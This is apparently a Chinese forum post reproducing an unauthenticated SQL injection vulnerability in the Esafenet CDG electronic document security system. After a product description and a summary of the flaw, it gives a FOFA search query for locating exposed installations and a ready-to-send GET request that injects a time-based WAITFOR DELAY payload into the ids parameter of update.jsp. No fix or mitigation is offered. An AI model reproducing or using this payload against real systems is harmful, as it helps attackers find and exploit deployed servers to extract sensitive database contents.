亿赛通电子文档安全管理体系 SQL注入漏洞复现

打印 上一主题 下一主题

主题 644|帖子 644|积分 1936

0x01 产品简介

亿赛通电子文档安全管理体系(简称:CDG)是一款电子文档安全加密软件,该体系利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法盗取企业核心重要数据资产,对电子文档进行全生命周期防护,体系具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部分涉密程度的差别(如核心部分和普通部分),摆设力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄漏体系,使得成本、效率和安全三者到达平衡,实现电子文档的数据安全。
0x02 漏洞概述

由于亿赛通电子文档安全管理体系 /update.jsp处的ids参数处对传入的数据没有预编译和富足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
0x03 复现环境

FOFA:app="亿赛通-电子文档安全管理体系"

0x04 漏洞复现

PoC
  1. GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1%2C3%29%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
  2. Host: your-ip
复制代码
PS:延时注入并非返回正常时间差


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

篮之新喜

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表